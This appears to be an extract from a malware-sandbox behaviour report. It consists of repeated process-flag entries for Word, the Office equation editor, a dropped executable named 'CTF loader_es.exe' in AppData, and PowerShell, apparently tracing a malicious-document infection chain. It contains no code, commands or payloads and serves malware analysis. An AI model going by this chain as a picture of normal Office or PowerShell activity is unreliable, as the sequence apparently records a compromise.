Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
